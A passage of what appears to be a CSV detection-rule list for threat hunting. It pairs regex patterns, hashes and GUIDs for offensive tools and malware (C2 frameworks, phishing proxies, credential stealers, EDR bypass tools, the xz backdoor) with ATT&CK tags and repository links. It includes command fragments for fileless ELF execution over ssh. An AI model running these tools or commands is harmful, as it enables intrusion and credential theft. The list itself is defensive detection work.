passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*fd13ae5d3ace637c564434554f669a30cd5d527c918d1681c856e62f2a4dea85*",".{0,1000}fd13ae5d3ace637c564434554f669a30cd5d527c918d1681c856e62f2a4dea85.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*fd735c976b71fe21f1f35dca8977865e69e4bb3a49ffb7c64c65d3a235d237a4*",".{0,1000}fd735c976b71fe21f1f35dca8977865e69e4bb3a49ffb7c64c65d3a235d237a4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*fd8dddeb318eb9ccdeea441dfed3a0b01c1187e1b165b75e7aaf515142abb171*",".{0,1000}fd8dddeb318eb9ccdeea441dfed3a0b01c1187e1b165b75e7aaf515142abb171.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*FD93D181-2EC5-4863-8A8F-5F8C84C06B35*",".{0,1000}FD93D181\-2EC5\-4863\-8A8F\-5F8C84C06B35.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*fd9af8832336604029ef8f8ce6c35f5b24efdcd593b5092ed4774dae62d8e9f8*",".{0,1000}fd9af8832336604029ef8f8ce6c35f5b24efdcd593b5092ed4774dae62d8e9f8.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*fda9ab818e038db8e7813ebfc1cdf52d3726c0ea08019b40d8b6088273d1bb07*",".{0,1000}fda9ab818e038db8e7813ebfc1cdf52d3726c0ea08019b40d8b6088273d1bb07.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*fdb1df0047a31328f0796bd07caf642efc35651ad78389025eb5afa2748bcd04*",".{0,1000}fdb1df0047a31328f0796bd07caf642efc35651ad78389025eb5afa2748bcd04.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*fdb2a63af6a5ae9aa60ceceb9e928188ac793a89f5282ed44c0d4be5f79559bb*",".{0,1000}fdb2a63af6a5ae9aa60ceceb9e928188ac793a89f5282ed44c0d4be5f79559bb.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*fdbf3b81cd69caf5230d76a8b039fd99*",".{0,1000}fdbf3b81cd69caf5230d76a8b039fd99.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*fdc984c09659c0ebf330d319bdebc772440dde7543aa6f74fd523a02fca2811d*",".{0,1000}fdc984c09659c0ebf330d319bdebc772440dde7543aa6f74fd523a02fca2811d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*FDD654F5-5C54-4D93-BF8E-FAF11B00E3E9*",".{0,1000}FDD654F5\-5C54\-4D93\-BF8E\-FAF11B00E3E9.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*fde1b109f9704ff7.css*",".{0,1000}fde1b109f9704ff7\.css.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*fdeb5626b8c7d92daf188d05564398134d3dd50c9d1d2b09352a5d5a0d2757ee*",".{0,1000}fdeb5626b8c7d92daf188d05564398134d3dd50c9d1d2b09352a5d5a0d2757ee.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*FDF5A0F3-73DA-4A8B-804F-EDD499A176EF*",".{0,1000}FDF5A0F3\-73DA\-4A8B\-804F\-EDD499A176EF.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*FE068381-F170-4C37-82C4-11A81FE60F1A*",".{0,1000}FE068381\-F170\-4C37\-82C4\-11A81FE60F1A.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*fe22bb52058886459e0ff6f9c1c70b4604b15c30b5f1e3ebfc58305d4e94a7e3*",".{0,1000}fe22bb52058886459e0ff6f9c1c70b4604b15c30b5f1e3ebfc58305d4e94a7e3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fe2cc64a77ca3a7620a9ddec10f9f6e80769132f5587cece5dd03d419782481d*",".{0,1000}fe2cc64a77ca3a7620a9ddec10f9f6e80769132f5587cece5dd03d419782481d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*FE4414D9-1D7E-4EEB-B781-D278FE7A5619*",".{0,1000}FE4414D9\-1D7E\-4EEB\-B781\-D278FE7A5619.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","0","N/A","10","2","102","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*fe6f27e7f2f8b93fd436a7ec4e99c0e79b40e639772b5c8e378406c7b867bd63*",".{0,1000}fe6f27e7f2f8b93fd436a7ec4e99c0e79b40e639772b5c8e378406c7b867bd63.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*fe8a247e683cf8041cb460365a29793bacf26f8214b82a7b44d2f8fad3b0af12*",".{0,1000}fe8a247e683cf8041cb460365a29793bacf26f8214b82a7b44d2f8fad3b0af12.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*fe8db7541bc0c9d05dbd2e44e5eaa2bfd5c79968983860416636ea2792abfa5e*",".{0,1000}fe8db7541bc0c9d05dbd2e44e5eaa2bfd5c79968983860416636ea2792abfa5e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*FE8F0D23-BDD1-416D-8285-F947BA86D155*",".{0,1000}FE8F0D23\-BDD1\-416D\-8285\-F947BA86D155.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","0","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*fea01b74-7a60-4142-a54d-7aa8f6471c00*",".{0,1000}fea01b74\-7a60\-4142\-a54d\-7aa8f6471c00.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*fed31f6b45974dfe2f4edc4a180cb44b44caad65e872aa6c656db1d7d3729608*",".{0,1000}fed31f6b45974dfe2f4edc4a180cb44b44caad65e872aa6c656db1d7d3729608.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*fed573df80a1aeb08f129824ce29906dd614fea7b3af704fa0e9324c26e5084a*",".{0,1000}fed573df80a1aeb08f129824ce29906dd614fea7b3af704fa0e9324c26e5084a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fee */* -l pl | perl*",".{0,1000}fee\s.{0,1000}\/.{0,1000}\s\-l\spl\s\|\sperl.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*fee */* -l pl | ruby*",".{0,1000}fee\s.{0,1000}\/.{0,1000}\s\-l\spl\s\|\sruby.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*fee -a *killall sshd* *busybox*",".{0,1000}fee\s\-a\s.{0,1000}killall\ssshd.{0,1000}\s.{0,1000}busybox.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*fee -c */* | ssh *@*",".{0,1000}fee\s\-c\s.{0,1000}\/.{0,1000}\s\|\sssh\s.{0,1000}\@.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*fee -c */* -w 64 | *",".{0,1000}fee\s\-c\s.{0,1000}\/.{0,1000}\s\-w\s64\s\|\s.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*fee8aa6d643d13d224330adb9389f37ec58c487cf91769158f5a650fa5522bde*",".{0,1000}fee8aa6d643d13d224330adb9389f37ec58c487cf91769158f5a650fa5522bde.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Fentanyl strikes again!*",".{0,1000}Fentanyl\sstrikes\sagain!.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*Fentanyl/fenty.py*",".{0,1000}Fentanyl\/fenty\.py.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*feroxbuster -w *fzf-wordlists* -u *",".{0,1000}feroxbuster\s\-w\s.{0,1000}fzf\-wordlists.{0,1000}\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Fertiliser.exe \\*",".{0,1000}Fertiliser\.exe\s\\\\.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*Fetching domain information through a Kerberos auth over LDAP*",".{0,1000}Fetching\sdomain\sinformation\sthrough\sa\sKerberos\sauth\sover\sLDAP.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*Fetching domain information through NTLM over LDAP*",".{0,1000}Fetching\sdomain\sinformation\sthrough\sNTLM\sover\sLDAP.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*ff_osx_extension-dropper*",".{0,1000}ff_osx_extension\-dropper.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*ff0f7b3bceac2a15be7b35bc7c1933b46ba6eeca6bba97dbd5227b59b913cb26*",".{0,1000}ff0f7b3bceac2a15be7b35bc7c1933b46ba6eeca6bba97dbd5227b59b913cb26.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*ff21d3231fe5e5c81f8640a0448236555e0730c58e4aec21c8004c6aa71e4eb4*",".{0,1000}ff21d3231fe5e5c81f8640a0448236555e0730c58e4aec21c8004c6aa71e4eb4.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*ff5a3bf00aa5f5664da20030aaafd09333f2a75830d3e7df3666d8c9fea9eaaa*",".{0,1000}ff5a3bf00aa5f5664da20030aaafd09333f2a75830d3e7df3666d8c9fea9eaaa.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*FF5F7C4C-6915-4C53-9DA3-B8BE6C5F1DB9*",".{0,1000}FF5F7C4C\-6915\-4C53\-9DA3\-B8BE6C5F1DB9.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*FFA0FDDE-BE70-49E4-97DE-753304EF1113*",".{0,1000}FFA0FDDE\-BE70\-49E4\-97DE\-753304EF1113.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*FFA0FDDE-BE70-49E4-97DE-753304EF1113*",".{0,1000}FFA0FDDE\-BE70\-49E4\-97DE\-753304EF1113.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*ffa5514b45c48061e412487d4defdeffa87a338213aa1bc4aabb3259ce18d7aa*",".{0,1000}ffa5514b45c48061e412487d4defdeffa87a338213aa1bc4aabb3259ce18d7aa.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*ffb3ecd39698fe5e2fc33483b159f10d1ba16801682aab754f61ccb814eff5d7*",".{0,1000}ffb3ecd39698fe5e2fc33483b159f10d1ba16801682aab754f61ccb814eff5d7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ffcd092a7d9ec7d79a115e3e98f4509bee3e3977e401967140e2e5de061f8a0b*",".{0,1000}ffcd092a7d9ec7d79a115e3e98f4509bee3e3977e401967140e2e5de061f8a0b.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","https://www.virustotal.com/gui/file/ffcd092a7d9ec7d79a115e3e98f4509bee3e3977e401967140e2e5de061f8a0b","10","10","N/A","N/A","N/A","N/A" "*ffe1396fa56e5f86812443498cd6c8abfca613099df1261d08f06a73b14be042*",".{0,1000}ffe1396fa56e5f86812443498cd6c8abfca613099df1261d08f06a73b14be042.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*FFE5AD77-8AF4-4A3F-8CE7-6BDC45565F07*",".{0,1000}FFE5AD77\-8AF4\-4A3F\-8CE7\-6BDC45565F07.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*ffebf73d11403dc0bb57ab23a775a568ff5c67c1bb5f8fac7a1f2fbd3960b619*",".{0,1000}ffebf73d11403dc0bb57ab23a775a568ff5c67c1bb5f8fac7a1f2fbd3960b619.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" 